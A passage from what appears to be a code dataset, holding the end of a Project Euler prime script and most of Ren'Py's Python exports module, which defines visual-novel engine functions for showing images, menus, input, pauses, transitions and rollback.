0):\n\t\t\treturn False\n\treturn True\n\nanswer = nth_prime(10001)\nprint(answer)","repo_name":"danbenedicto/project-euler","sub_path":"problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2036065686","text":"\r\n# Copyright 2004-2012 Tom Rothamel \r\n#\r\n# Permission is hereby granted, free of charge, to any person\r\n# obtaining a copy of this software and 
associated documentation files\r\n# (the \"Software\"), to deal in the Software without restriction,\r\n# including without limitation the rights to use, copy, modify, merge,\r\n# publish, distribute, sublicense, and/or sell copies of the Software,\r\n# and to permit persons to whom the Software is furnished to do so,\r\n# subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be\r\n# included in all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\r\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\r\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\r\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE\r\n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\r\n# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION\r\n# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n\r\n# This file contains functions that are exported to the script namespace.\r\n# Functions defined in this file can be updated by the user to change\r\n# their behavior, while functions imported in are probably best left\r\n# alone as part of the api.\r\n\r\n# Remember the real file.\r\n_file = file\r\n\r\nimport renpy.display\r\nimport renpy.audio\r\n\r\nfrom renpy.text.extras import ParameterizedText\r\nfrom renpy.text.font import register_sfont, register_mudgefont, register_bmfont\r\nfrom renpy.display.behavior import Keymap\r\nfrom renpy.display.minigame import Minigame\r\nfrom renpy.display.screen import define_screen, show_screen, hide_screen, use_screen, current_screen, has_screen, get_screen, get_widget\r\nfrom renpy.display.focus import focus_coordinates\r\nfrom renpy.display.predict import screen as predict_screen\r\n\r\nfrom renpy.curry import curry, partial\r\nfrom renpy.audio.sound import play\r\nfrom renpy.display.video import movie_start_fullscreen, movie_start_displayable, movie_stop\r\nfrom renpy.loadsave import load, save, list_saved_games, can_load, rename_save, unlink_save, scan_saved_game\r\nfrom renpy.python import py_eval as eval\r\nfrom renpy.python import rng as random\r\nfrom renpy.atl import atl_warper\r\nfrom renpy.easy import predict, displayable\r\nfrom renpy.substitutions import Translator\r\n\r\nfrom renpy.character import show_display_say, predict_show_display_say, display_say\r\n\r\nimport renpy.audio.sound as sound\r\nimport renpy.audio.music as music\r\n\r\nimport time\r\nimport sys\r\n\r\ndef public_api():\r\n \"\"\"\r\n This does nothing, except to make the pyflakes warnings about\r\n unused imports go away.\r\n \"\"\"\r\n ParameterizedText\r\n register_sfont, register_mudgefont, register_bmfont\r\n Keymap\r\n Minigame\r\n curry, partial\r\n play\r\n movie_start_fullscreen, movie_start_displayable, movie_stop\r\n load, save, list_saved_games, can_load, rename_save, unlink_save, scan_saved_game\r\n eval\r\n random\r\n atl_warper\r\n show_display_say, predict_show_display_say, display_say\r\n sound\r\n music\r\n time\r\n define_screen, show_screen, hide_screen, use_screen, has_screen\r\n current_screen, get_screen, get_widget\r\n focus_coordinates\r\n predict, predict_screen\r\n displayable\r\n Translator\r\n \r\ndel public_api\r\n\r\nimport collections\r\n\r\ndef roll_forward_info():\r\n if len(renpy.game.contexts) > 1:\r\n return None\r\n \r\n return renpy.game.log.forward_info()\r\n\r\ndef in_rollback():\r\n return renpy.game.log.in_rollback()\r\n\r\ndef 
checkpoint(data=None, keep_rollback=False):\r\n \"\"\"\r\n This creates a checkpoint that the user can rollback to. The\r\n checkpoint is placed at the statement after the last statement\r\n that interacted with the user. Once this function has been called,\r\n there should be no more interaction with the user in the current\r\n statement.\r\n \"\"\"\r\n\r\n if renpy.store._rollback:\r\n renpy.game.log.checkpoint(data, keep_rollback=keep_rollback)\r\n\r\ndef block_rollback():\r\n \"\"\"\r\n Prevents the game from rolling back to before the current\r\n statement.\r\n \"\"\"\r\n\r\n renpy.game.log.block()\r\n\r\nscene_lists = renpy.display.core.scene_lists\r\n \r\ndef count_displayables_in_layer(layer):\r\n \"\"\"\r\n Returns how many displayables are in the supplied layer.\r\n \"\"\"\r\n\r\n sls = scene_lists()\r\n\r\n return len(sls.layers[layer])\r\n\r\ndef image(name, d):\r\n \"\"\"\r\n :doc: se_images\r\n \r\n Defines an image. This function is the python equivalent of the \r\n image statement.\r\n \r\n `name`\r\n The name of the image to display, a string.\r\n \r\n `d`\r\n The displayable to associate with that image name.\r\n \r\n This function may only be run from inside an init block. It is an\r\n error to run this function once the game has started.\r\n \"\"\"\r\n\r\n if d is None:\r\n raise Exception(\"Images may not be declared to be None.\")\r\n \r\n if not renpy.game.context().init_phase:\r\n raise Exception(\"Images may only be declared inside init blocks.\")\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n d = renpy.easy.displayable(d)\r\n renpy.display.image.register_image(name, d)\r\n\r\ndef copy_images(old, new):\r\n if not isinstance(old, tuple):\r\n old = tuple(old.split())\r\n\r\n if not isinstance(new, tuple):\r\n new = tuple(new.split())\r\n\r\n lenold = len(old)\r\n \r\n for k, v in renpy.display.image.images.items():\r\n if len(k) < lenold:\r\n continue\r\n \r\n if k[:lenold] == old:\r\n renpy.display.image.register_image(new + k[lenold:], v)\r\n \r\ndef showing(name, layer='master'):\r\n \"\"\"\r\n This returns true if an image with the same tag as that found in\r\n the suppled image name is present on the given layer.\r\n\r\n @param name may be a tuple of strings, or a single string. In the latter\r\n case, it is split on whitespace to make a tuple. The first element\r\n of the tuple is used as the image tag.\r\n\r\n @param layer is the name of the layer.\r\n \"\"\"\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n return renpy.game.context().images.showing(layer, name)\r\n\r\ndef show(name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ], atl=None, transient=False, munge_name=True):\r\n \"\"\"\r\n :doc: se_images\r\n :args: (name, at_list=[ ], layer='master', what=None, zorder=0, tag=None, behind=[ ])\r\n \r\n Shows an image on a layer. This is the programmatic equivalent of the show\r\n statement.\r\n \r\n `name`\r\n The name of the image to show, a string.\r\n \r\n `at_list`\r\n A list of transforms that are applied to the image.\r\n The equivalent of the ``at`` property.\r\n \r\n `layer`\r\n A string, giving the name of the layer on which the image will be shown.\r\n The equivalent of the ``onlayer`` property.\r\n \r\n `what`\r\n If not None, this is a displayable that will be shown in lieu of \r\n looking on the image. (This is the equivalent of the show expression\r\n statement.) 
When a `what` parameter is given, `name` can be used to\r\n associate a tag with the image.\r\n \r\n `zorder`\r\n An integer, the equivalent of the ``zorder`` property.\r\n \r\n `tag`\r\n A string, used to specify the the image tag of the shown image. The\r\n equivalent of the ``as`` property.\r\n \r\n `behind`\r\n A list of strings, giving image tags that this image is shown behind.\r\n The equivalent of the ``behind`` property.\r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Show may not run while in init phase.\")\r\n \r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n sls = scene_lists()\r\n key = tag or name[0]\r\n\r\n if renpy.config.sticky_positions: \r\n if not at_list and key in sls.at_list[layer]:\r\n at_list = sls.at_list[layer][key]\r\n\r\n if what is None:\r\n what = name\r\n elif isinstance(what, basestring):\r\n what = tuple(what.split())\r\n\r\n if isinstance(what, renpy.display.core.Displayable):\r\n base = img = what\r\n\r\n else:\r\n\r\n if renpy.config.image_attributes:\r\n new_what = renpy.game.context().images.apply_attributes(layer, key, name)\r\n if new_what is not None:\r\n what = new_what\r\n name = (key,) + new_what[1:]\r\n \r\n base = img = renpy.display.image.ImageReference(what, style='image_placement')\r\n \r\n if not base.find_target() and renpy.config.missing_show:\r\n if renpy.config.missing_show(name, what, layer):\r\n return\r\n \r\n for i in at_list:\r\n if isinstance(i, renpy.display.motion.Transform):\r\n img = i(child=img)\r\n else:\r\n img = i(img)\r\n\r\n # Update the list of images we have ever seen.\r\n renpy.game.persistent._seen_images[name] = True\r\n\r\n if tag and munge_name:\r\n name = (tag,) + name[1:]\r\n \r\n\r\n if renpy.config.missing_hide:\r\n renpy.config.missing_hide(name, layer)\r\n\r\n sls.add(layer, img, key, zorder, behind, at_list=at_list, name=name, atl=atl, default_transform=renpy.config.default_transform, transient=transient)\r\n \r\n\r\ndef hide(name, layer='master'):\r\n \"\"\"\r\n :doc: se_images\r\n \r\n Hides an image from a layer. The python equivalent of the hide statement.\r\n \r\n `name`\r\n The name of the image to hide. Only the image tag is used, and \r\n any image with the tag is hidden (the precise name does not matter).\r\n \r\n `layer`\r\n The layer on which this function operates.\r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Hide may not run while in init phase.\")\r\n\r\n if not isinstance(name, tuple):\r\n name = tuple(name.split())\r\n\r\n sls = scene_lists()\r\n key = name[0]\r\n sls.remove(layer, key)\r\n\r\n if renpy.config.missing_hide:\r\n renpy.config.missing_hide(name, layer)\r\n \r\n\r\ndef scene(layer='master'):\r\n \"\"\"\r\n :doc: se_images\r\n\r\n Removes all displayables from `layer`. This is equivalent to the scene\r\n statement, when the scene statement is not given an image to show.\r\n\r\n A full scene statement is equivalent to a call to renpy.scene followed by a\r\n call to :func:`renpy.show`. 
For example::\r\n \r\n scene bg beach \r\n \r\n is equivalent to::\r\n \r\n $ renpy.scene()\r\n $ renpy.show(\"bg beach\") \r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"Scene may not run while in init phase.\")\r\n\r\n sls = scene_lists()\r\n sls.clear(layer)\r\n\r\n if renpy.config.missing_scene:\r\n renpy.config.missing_scene(layer)\r\n \r\ndef watch(expression, style='default', **properties):\r\n \"\"\"\r\n This watches the given python expression, by displaying it in the\r\n upper-left corner of the screen (although position properties\r\n can change that). The expression should always be\r\n defined, never throwing an exception.\r\n\r\n A watch will not persist through a save or restart.\r\n \"\"\"\r\n\r\n def overlay_func():\r\n renpy.ui.text(unicode(renpy.python.py_eval(expression)),\r\n style=style, **properties)\r\n\r\n renpy.config.overlay_functions.append(overlay_func)\r\n\r\ndef input(prompt, default='', allow=None, exclude='{}', length=None, with_none=None): #@ReservedAssignment\r\n \"\"\"\r\n This pops up a window requesting that the user enter in some text.\r\n It returns the entered text.\r\n\r\n @param prompt: A prompt that is used to ask the user for the text.\r\n\r\n @param default: A default for the text that this input can return.\r\n\r\n @param length: If given, a limit to the amount of text that this\r\n function will return.\r\n\r\n @param allow: If not None, then if an input character is not in this\r\n string, it is ignored.\r\n\r\n @param exclude: If not None, then if an input character is in this\r\n set, it is ignored.\r\n\r\n @param with_none: If True, performs a with None after the input. If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n renpy.exports.mode('input')\r\n \r\n if has_screen(\"input\"):\r\n widget_properties = { }\r\n widget_properties[\"input\"] = dict(default=default, length=length, allow=allow, exclude=exclude)\r\n\r\n show_screen(\"input\", _transient=True, _widget_properties=widget_properties, prompt=prompt)\r\n\r\n else:\r\n\r\n renpy.ui.window(style='input_window')\r\n renpy.ui.vbox()\r\n\r\n renpy.ui.text(prompt, style='input_prompt')\r\n renpy.ui.input(default, length=length, style='input_text', allow=allow, exclude=exclude)\r\n\r\n renpy.ui.close()\r\n\r\n renpy.exports.shown_window()\r\n \r\n roll_forward = renpy.exports.roll_forward_info()\r\n if not isinstance(roll_forward, basestring):\r\n roll_forward = None\r\n\r\n rv = renpy.ui.interact(mouse='prompt', type=\"input\", roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv)\r\n \r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n\r\ndef menu(items, set_expr):\r\n \"\"\"\r\n Displays a menu, and returns to the user the value of the selected\r\n choice. 
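Each item is a (label, condition, value) tuple, as the filtering below assumes.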
Also handles conditions and the menuset.\r\n \"\"\"\r\n\r\n if renpy.config.old_substitutions:\r\n def substitute(s):\r\n return s % tag_quoting_dict\r\n else:\r\n def substitute(s):\r\n return s\r\n\r\n\r\n # Filter the list of items to only include ones for which the\r\n # condition is true.\r\n items = [ (substitute(label), value)\r\n for label, condition, value in items\r\n if renpy.python.py_eval(condition) ]\r\n\r\n # Filter the list of items on the set_expr:\r\n if set_expr:\r\n set = renpy.python.py_eval(set_expr) #@ReservedAssignment\r\n items = [ (label, value)\r\n for label, value in items\r\n if label not in set ]\r\n else:\r\n set = None #@ReservedAssignment\r\n\r\n # Check to see if there's at least one choice in set of items:\r\n choices = [ value for label, value in items if value is not None ]\r\n\r\n # If not, bail out.\r\n if not choices:\r\n return None\r\n\r\n # Show the menu.\r\n rv = renpy.store.menu(items)\r\n\r\n # If we have a set, fill it in with the label of the chosen item.\r\n if set is not None and rv is not None:\r\n for label, value in items:\r\n if value == rv:\r\n try:\r\n set.append(label)\r\n except AttributeError:\r\n set.add(label)\r\n return rv\r\n\r\ndef choice_for_skipping():\r\n \"\"\"\r\n This is called to indicate to the skipping code that we have\r\n reached a choice. If we're skipping, and if the skip after\r\n choices preference is not True, then this disables skipping.\r\n \"\"\"\r\n\r\n if renpy.config.skipping and not renpy.game.preferences.skip_after_choices:\r\n renpy.config.skipping = None\r\n \r\n\r\ndef predict_menu():\r\n \"\"\"\r\n Predicts widgets that are used by the menu.\r\n \"\"\"\r\n\r\n # This only makes sense for non-NVL menus. But when we have\r\n # NVL menus, they're likely to have already been predicted.\r\n #\r\n # An item lets us load imagebuttons as necessary.\r\n\r\n if not renpy.config.choice_screen_chosen:\r\n return\r\n \r\n items = [ (\"Menu Prediction\", True, False) ]\r\n \r\n predict_screen(\r\n \"choice\",\r\n items=items,\r\n )\r\n\r\n \r\ndef display_menu(items,\r\n window_style='menu_window',\r\n interact=True,\r\n with_none=None,\r\n caption_style='menu_caption',\r\n choice_style='menu_choice',\r\n choice_chosen_style='menu_choice_chosen',\r\n choice_button_style='menu_choice_button',\r\n choice_chosen_button_style='menu_choice_chosen_button',\r\n scope={ },\r\n widget_properties=None,\r\n screen=\"choice\",\r\n type=\"menu\", #@ReservedAssignment\r\n predict_only=False,\r\n **kwargs):\r\n \"\"\"\r\n Displays a menu containing the given items, returning the value of\r\n the item the user selects.\r\n\r\n @param items: A list of tuples that are the items to be added to\r\n this menu. The first element of a tuple is a string that is used\r\n for this menuitem. The second element is the value to be returned\r\n if this item is selected, or None if this item is a non-selectable\r\n caption.\r\n\r\n @param interact: If True, then an interaction occurs. If False, no suc\r\n interaction occurs, and the user should call ui.interact() manually.\r\n\r\n @param with_none: If True, performs a with None after the input. 
If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n if interact:\r\n renpy.exports.mode(type) \r\n choice_for_skipping()\r\n\r\n # The possible choices in the menu.\r\n choices = [ val for label, val in items ]\r\n while None in choices:\r\n choices.remove(None)\r\n\r\n # Roll forward.\r\n roll_forward = renpy.exports.roll_forward_info()\r\n\r\n if roll_forward not in choices:\r\n roll_forward = None\r\n \r\n # Auto choosing.\r\n if renpy.config.auto_choice_delay:\r\n\r\n renpy.ui.pausebehavior(renpy.config.auto_choice_delay,\r\n random.choice(choices))\r\n\r\n # The chosen dictionary.\r\n chosen = renpy.game.persistent._chosen\r\n if chosen is None:\r\n chosen = renpy.game.persistent._chosen = { }\r\n\r\n # The location\r\n location=renpy.game.context().current\r\n \r\n \r\n # Show the menu.\r\n if has_screen(screen):\r\n\r\n item_actions = [ ]\r\n\r\n if widget_properties is None:\r\n props = { }\r\n else:\r\n props = widget_properties\r\n \r\n for (label, value) in items:\r\n\r\n if not label:\r\n value = None\r\n\r\n if value is not None:\r\n action = renpy.ui.returns(value)\r\n else:\r\n action = None\r\n \r\n label_chosen = ((location, label) in chosen)\r\n \r\n if renpy.config.choice_screen_chosen:\r\n item_actions.append((label, action, label_chosen))\r\n else:\r\n item_actions.append((label, action))\r\n\r\n show_screen(screen, items=item_actions, _widget_properties=props, _transient=True, **scope)\r\n\r\n else:\r\n renpy.ui.window(style=window_style, focus=\"menu\")\r\n renpy.ui.menu(items,\r\n location=renpy.game.context().current,\r\n focus=\"choices\",\r\n default=True,\r\n caption_style=caption_style,\r\n choice_style=choice_style,\r\n choice_chosen_style=choice_chosen_style,\r\n choice_button_style=choice_button_style,\r\n choice_chosen_button_style=choice_chosen_button_style,\r\n **kwargs)\r\n\r\n renpy.exports.shown_window()\r\n\r\n # Log the chosen choice.\r\n for label, val in items:\r\n if val is not None:\r\n log(\"Choice: \" + label)\r\n else:\r\n log(label)\r\n\r\n log(\"\")\r\n\r\n if interact:\r\n \r\n rv = renpy.ui.interact(mouse='menu', type=type, roll_forward=roll_forward)\r\n\r\n # Mark this as chosen.\r\n for label, val in items:\r\n if rv == val:\r\n chosen[(location, label)] = True\r\n\r\n \r\n for label, val in items:\r\n if rv == val:\r\n log(\"User chose: \" + label)\r\n break\r\n else:\r\n log(\"No choice chosen.\")\r\n\r\n log(\"\")\r\n\r\n checkpoint(rv)\r\n \r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n return None\r\n\r\nclass TagQuotingDict(object):\r\n def __getitem__(self, key):\r\n\r\n store = vars(renpy.store)\r\n \r\n if key in store:\r\n rv = store[key]\r\n\r\n if isinstance(rv, (str, unicode)):\r\n rv = rv.replace(\"{\", \"{{\")\r\n\r\n return rv\r\n else:\r\n if renpy.config.debug:\r\n raise Exception(\"During an interpolation, '%s' was not found as a variable.\" % key)\r\n return \"<\" + key + \" unbound>\"\r\n\r\ntag_quoting_dict = TagQuotingDict()\r\n\r\ndef predict_say(who, what):\r\n \"\"\"\r\n This is called to predict the results of a say command.\r\n \"\"\"\r\n\r\n if who is None:\r\n who = renpy.store.narrator # E1101 @UndefinedVariable\r\n\r\n if isinstance(who, (str, unicode)):\r\n return renpy.store.predict_say(who, what)\r\n\r\n predict = getattr(who, 'predict', None)\r\n if predict: \r\n predict(what)\r\n\r\ndef scry_say(who, scry):\r\n \"\"\"\r\n Called when scry is called on a 
say statement. Needs to set\r\n the interacts field.\r\n \"\"\"\r\n \r\n try:\r\n scry.interacts = who.will_interact()\r\n except:\r\n scry.interacts = True\r\n \r\ndef say(who, what, interact=True):\r\n \"\"\"\r\n This is the core of the say command. If the who parameter is None\r\n or a string, it is passed directly to display_say. Otherwise, the\r\n say method is called on the who object with what as a parameter.\r\n \"\"\"\r\n \r\n if renpy.config.old_substitutions:\r\n # Interpolate variables.\r\n what = what % tag_quoting_dict\r\n\r\n if who is None:\r\n who = renpy.store.narrator # E1101 @UndefinedVariable\r\n\r\n if isinstance(who, (str, unicode)):\r\n renpy.store.say(who, what, interact=interact)\r\n else:\r\n who(what, interact=interact)\r\n\r\n \r\ndef imagemap(ground, selected, hotspots, unselected=None, overlays=False,\r\n style='imagemap', mouse='imagemap', with_none=None, **properties):\r\n \"\"\"\r\n Displays an imagemap. An image map consists of two images and a\r\n list of hotspots that are defined on that image. When the user\r\n clicks on a hotspot, the value associated with that hotspot is\r\n returned.\r\n\r\n @param ground: The name of the file containing the ground\r\n image. The ground image is displayed for areas that are not part\r\n of any hotspots.\r\n\r\n @param selected: The name of the file containing the selected\r\n image. This image is displayed in hotspots when the mouse is over\r\n them.\r\n\r\n @param hotspots: A list of tuples defining the hotspots in this\r\n image map. Each tuple has the format (x0, y0, x1, y1, result).\r\n (x0, y0) gives the coordinates of the upper-left corner of the\r\n hotspot, (x1, y1) gives the lower-right corner, and result gives\r\n the value returned from this function if the mouse is clicked in\r\n the hotspot.\r\n\r\n @param unselected: If provided, then it is the name of a file\r\n containing the image that's used to fill in hotspots that are not\r\n selected as part of any image. If not provided, the ground image\r\n is used instead.\r\n \r\n @param overlays: If True, overlays are displayed when this imagemap\r\n is active. If False, the overlays are suppressed.\r\n\r\n @param with_none: If True, performs a with None after the input. 
If None,\r\n takes the value from config.implicit_with_none.\r\n \"\"\"\r\n\r\n renpy.exports.mode('imagemap')\r\n \r\n renpy.ui.imagemap_compat(ground, selected, hotspots, unselected=unselected,\r\n style=style, **properties)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n if roll_forward not in [ result for _x0, _y0, _x1, _y1, result in hotspots]:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(suppress_overlay=(not overlays),\r\n type='imagemap',\r\n mouse=mouse,\r\n roll_forward=roll_forward)\r\n\r\n renpy.exports.checkpoint(rv)\r\n\r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n \r\n\r\ndef pause(delay=None, music=None, with_none=None, hard=False):\r\n \r\n if renpy.config.skipping == \"fast\":\r\n return True\r\n\r\n renpy.exports.mode('pause')\r\n \r\n if music is not None:\r\n newdelay = renpy.audio.music.get_delay(music)\r\n\r\n if newdelay is not None:\r\n delay = newdelay\r\n\r\n if hard: \r\n renpy.ui.saybehavior(dismiss='dismiss_hard_pause')\r\n else:\r\n renpy.ui.saybehavior()\r\n \r\n if delay is not None:\r\n renpy.ui.pausebehavior(delay, False)\r\n\r\n roll_forward = renpy.exports.roll_forward_info()\r\n if roll_forward not in [ True, False ]:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(mouse='pause', type='pause', roll_forward=roll_forward)\r\n renpy.exports.checkpoint(rv, keep_rollback=True)\r\n\r\n\r\n if with_none is None:\r\n with_none = renpy.config.implicit_with_none\r\n\r\n if with_none:\r\n renpy.game.interface.do_with(None, None)\r\n\r\n return rv\r\n\r\n\r\ndef movie_cutscene(filename, delay=None, loops=0, stop_music=True):\r\n \"\"\"\r\n This displays an MPEG-1 cutscene for the specified number of\r\n seconds. The user can click to interrupt the cutscene.\r\n Overlays and Underlays are disabled for the duration of the cutscene.\r\n\r\n @param filename: The name of a file containing an MPEG-1 movie.\r\n\r\n @param delay: The number of seconds to wait before ending the cutscene.\r\n Normally the length of the movie, in seconds. If None, then the\r\n delay is computed from the number of loops (that is, loops + 1) *\r\n the length of the movie. If -1, we wait until the user clicks.\r\n \r\n @param loops: The number of extra loops to show, -1 to loop forever.\r\n\r\n Returns True if the movie was terminated by the user, or False if the\r\n given delay elapsed uninterrupted.\r\n \"\"\"\r\n\r\n renpy.exports.mode('movie')\r\n \r\n if stop_music:\r\n renpy.audio.audio.set_force_stop(\"music\", True)\r\n \r\n movie_start_fullscreen(filename, loops=loops)\r\n \r\n renpy.ui.saybehavior()\r\n\r\n if delay is None or delay < 0:\r\n renpy.ui.soundstopbehavior(\"movie\")\r\n else:\r\n renpy.ui.pausebehavior(delay, False)\r\n\r\n if renpy.game.log.forward:\r\n roll_forward = True\r\n else:\r\n roll_forward = None\r\n \r\n rv = renpy.ui.interact(suppress_overlay=True,\r\n suppress_underlay=True,\r\n show_mouse=False,\r\n roll_forward=roll_forward)\r\n\r\n # We don't want to put a checkpoint here, as we can't roll back while\r\n # playing a cutscene.\r\n\r\n movie_stop()\r\n\r\n if stop_music:\r\n renpy.audio.audio.set_force_stop(\"music\", False)\r\n\r\n return rv\r\n \r\n\r\ndef with_statement(trans, always=False, paired=None, clear=True):\r\n \"\"\"\r\n :doc: se_with\r\n :name: renpy.with_statement\r\n :args: (trans, always=False)\r\n \r\n Causes a transition to occur. 
This is the python equivalent of the\r\n with statement.\r\n \r\n `trans`\r\n The transition.\r\n \r\n `always`\r\n If True, the transition will always occur, even if the user has\r\n disabled transitions.\r\n \r\n This function returns true if the user chose to interrupt the transition,\r\n and false otherwise. \r\n \"\"\"\r\n\r\n if renpy.game.context().init_phase:\r\n raise Exception(\"With statements may not run while in init phase.\")\r\n\r\n if renpy.config.skipping:\r\n trans = None\r\n\r\n if not (renpy.game.preferences.transitions or always):\r\n trans = None\r\n\r\n renpy.exports.mode('with')\r\n \r\n return renpy.game.interface.do_with(trans, paired, clear=clear)\r\n\r\nglobals()[\"with\"] = with_statement\r\n\r\ndef rollback(force=False, checkpoints=1):\r\n \"\"\"\r\n Rolls the state of the game back to the last checkpoint.\r\n \"\"\"\r\n\r\n if not force:\r\n \r\n if not renpy.store._rollback:\r\n return\r\n \r\n if not renpy.game.context().rollback:\r\n return\r\n \r\n if not renpy.config.rollback_enabled:\r\n return\r\n \r\n renpy.config.skipping = None\r\n renpy.game.log.complete()\r\n renpy.game.log.rollback(checkpoints)\r\n\r\ndef toggle_fullscreen():\r\n \"\"\"\r\n Toggles the fullscreen mode.\r\n \"\"\"\r\n\r\n renpy.game.preferences.fullscreen = not renpy.game.preferences.fullscreen\r\n\r\ndef toggle_music():\r\n \"\"\"\r\n Toggles the playing of music.\r\n \"\"\"\r\n\r\n renpy.game.preferences.music = not renpy.game.preferences.music\r\n \r\ndef has_label(name):\r\n \"\"\"\r\n Returns true if name is a valid label in the program, or false\r\n otherwise.\r\n \"\"\"\r\n\r\n return renpy.game.script.has_label(name)\r\n\r\ndef get_all_labels():\r\n rv = [ ]\r\n\r\n for i in renpy.game.script.namemap.iterkeys():\r\n if isinstance(i, basestring):\r\n rv.append(i)\r\n\r\n return renpy.python.RevertableSet(rv)\r\n \r\n\r\ndef take_screenshot(scale=None, background=False):\r\n \"\"\"\r\n This causes a screenshot to be taken. This screenshot will be\r\n saved with a savegame when the game is saved.\r\n \"\"\"\r\n\r\n if scale is None:\r\n scale = (renpy.config.thumbnail_width, renpy.config.thumbnail_height)\r\n \r\n renpy.game.interface.take_screenshot(scale, background=background)\r\n\r\ndef full_restart(transition=False, label=\"_invoke_main_menu\", target=\"_main_menu\"):\r\n \"\"\"\r\n This causes a full restart of Ren'Py. \r\n \"\"\"\r\n\r\n if transition is False:\r\n transition = renpy.config.end_game_transition\r\n \r\n raise renpy.game.FullRestartException((transition, label, target))\r\n\r\ndef utter_restart():\r\n \"\"\"\r\n This causes an utter restart of Ren'Py. This reloads the script and\r\n re-runs initialization.\r\n \"\"\"\r\n\r\n raise renpy.game.UtterRestartException()\r\n\r\ndef quit(): #@ReservedAssignment\r\n \"\"\"\r\n This causes Ren'Py to exit entirely.\r\n \"\"\"\r\n\r\n raise renpy.game.QuitException()\r\n\r\ndef jump(label):\r\n \"\"\"\r\n Causes the current statement to end, and control to jump to the given\r\n label.\r\n \"\"\"\r\n\r\n raise renpy.game.JumpException(label)\r\n\r\ndef jump_out_of_context(label):\r\n \"\"\"\r\n Causes control to leave the current context, and then to be\r\n transferred in the parent context to the given label.\r\n \"\"\"\r\n\r\n raise renpy.game.JumpOutException(label)\r\n\r\ndef screenshot(filename):\r\n \"\"\"\r\n Saves a screenshot in the named filename.\r\n \"\"\"\r\n\r\n renpy.game.interface.save_screenshot(filename)\r\n \r\ndef windows():\r\n \"\"\"\r\n Returns true if we're running on Windows. 
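(Internally, this just checks ``hasattr(sys, 'winver')``.)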
This is generally used as a\r\n test when setting styles.\r\n \"\"\"\r\n\r\n import sys\r\n return hasattr(sys, 'winver')\r\n\r\ndef version():\r\n \"\"\"\r\n Returns a string containing the current version of Ren'Py, prefixed with the\r\n string \"Ren\\'Py \".\r\n \"\"\"\r\n\r\n return renpy.version\r\n\r\ndef module_version():\r\n \"\"\"\r\n Returns a number corresponding to the current version of the Ren'Py module,\r\n or 0 if the module wasn't loaded.\r\n \"\"\"\r\n\r\n return renpy.display.module.version\r\n\r\ndef transition(trans, layer=None, always=False, force=False):\r\n \"\"\"\r\n Sets the transition that will be used for the next\r\n interaction. This is useful when the next interaction doesn't take\r\n a with clause, as is the case with pause, input, and imagemap.\r\n\r\n @param layer: If the layer setting is not None, then the transition\r\n will be applied only to the layer named. Please note that only some\r\n transitions can be applied to specific layers.\r\n \"\"\"\r\n\r\n if not always and not renpy.game.preferences.transitions:\r\n trans = None\r\n\r\n renpy.game.interface.set_transition(trans, layer, force=force)\r\n\r\ndef get_transition(layer=None):\r\n return renpy.game.interface.transition.get(layer, None)\r\n \r\ndef clear_game_runtime():\r\n \"\"\"\r\n Resets the game runtime timer down to 0.\r\n\r\n The game runtime counter counts the number of seconds that have\r\n elapsed while waiting for user input in the current context. (So\r\n it doesn't count time spent in the game menu.)\r\n \"\"\"\r\n \r\n renpy.game.context().runtime = 0\r\n\r\ndef get_game_runtime():\r\n \"\"\"\r\n Returns the number of seconds that have elapsed in gameplay since\r\n the last call to clear_game_timer, as a float.\r\n\r\n The game runtime counter counts the number of seconds that have\r\n elapsed while waiting for user input in the current context. (So\r\n it doesn't count time spent in the game menu.)\r\n \"\"\"\r\n\r\n return renpy.game.context().runtime\r\n\r\ndef loadable(filename):\r\n \"\"\"\r\n Returns True if the given filename is loadable, meaning that it\r\n can be loaded from the disk or from inside an archive. Returns\r\n False if this is not the case.\r\n \"\"\"\r\n\r\n return renpy.loader.loadable(filename)\r\n\r\ndef exists(filename):\r\n \"\"\"\r\n Returns true if the given filename can be found in the\r\n searchpath. This only works if a physical file exists on disk. It\r\n won't find the file if it's inside of an archive.\r\n \"\"\"\r\n\r\n try:\r\n renpy.loader.transfn(filename)\r\n return True\r\n except:\r\n return False\r\n\r\ndef restart_interaction():\r\n \"\"\"\r\n Calling this restarts the current interaction. This will immediately end\r\n any ongoing transition, and will call all of the overlay functions again.\r\n\r\n This should be called whenever widgets are added or removed over the course\r\n of an interaction, or when the information used to construct the overlay\r\n changes.\r\n \"\"\"\r\n\r\n renpy.game.interface.restart_interaction = True\r\n \r\ndef context():\r\n \"\"\"\r\n Returns an object that is unique to 